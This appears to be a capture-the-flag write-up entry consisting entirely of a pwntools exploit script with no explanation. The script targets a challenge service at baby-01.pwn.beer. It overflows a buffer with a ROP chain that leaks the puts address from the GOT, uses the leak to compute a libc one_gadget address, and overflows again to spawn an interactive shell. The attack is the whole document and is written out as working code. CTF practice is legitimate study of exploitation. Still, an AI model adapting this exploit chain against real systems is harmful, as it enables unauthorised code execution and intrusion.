Tags: one_gadget pwn leak
Rating: 3.0
```
from pwn import *
r=remote('baby-01.pwn.beer', 10002)
context.log_level='debug'
libc = ELF('libc.so.6')
pop_rdi = 0x0000000000400783
binsh = 0x400286
puts_got = 0x601fc8
start = 0x004005a0
call_puts = 0x00400550
r.sendlineafter('input: ', 0x18 * 'a' + p64(pop_rdi) + p64(puts_got) + p64(call_puts) + p64(start))
one_gadget = u64(r.recv(6)+'\x00\x00') - libc.symbols['puts'] + 0x4f2c5
r.sendlineafter('input: ', 0x18 * 'a' + p64(one_gadget))
r.interactive()
```
